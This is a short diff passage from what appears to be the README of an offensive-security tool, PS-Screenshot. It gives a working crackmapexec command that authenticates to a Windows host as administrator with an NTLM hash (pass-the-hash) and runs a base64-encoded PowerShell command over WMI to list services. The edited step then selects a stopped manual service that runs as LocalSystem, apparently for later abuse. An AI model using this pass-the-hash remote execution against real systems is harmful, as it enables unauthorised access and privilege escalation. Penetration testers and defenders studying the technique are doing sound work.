billchaison/PS-Screenshot/README.md

 Use crackmap to list services on the target (192.168.1.242) using the base64 output:<br />
 `crackmapexec smb 192.168.1.242 -u administrator -d WIN10PRO -H a75001b474226887ca86ef09e1ae01ce --exec-method wmiexec -x 'powershell.exe -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAHcAaQBuADMAMgBfAHMAZQByAHYAaQBjAGUAIAB8ACAARgBvAHIAbQBhAHQALQBsAGkAcwB0ACAATgBhAG0AZQAsAEQAaQBzAHAAbABhAHkATgBhAG0AZQAsAFMAdABhAHQAZQAsAFMAdABhAHIAdABNAG8AZABlACwAUwB0AGEAcgB0AE4AYQBtAGUALABQAGEAdABoAE4AYQBtAGUACgA='`<br />

-Select a service that is set to manual and is not running (e.g.):<br />
+Select a service that is set to manual, is not running and launches as LocalSystem (e.g.):<br />
 ```
 Name        : AppMgmt
 DisplayName : Application Management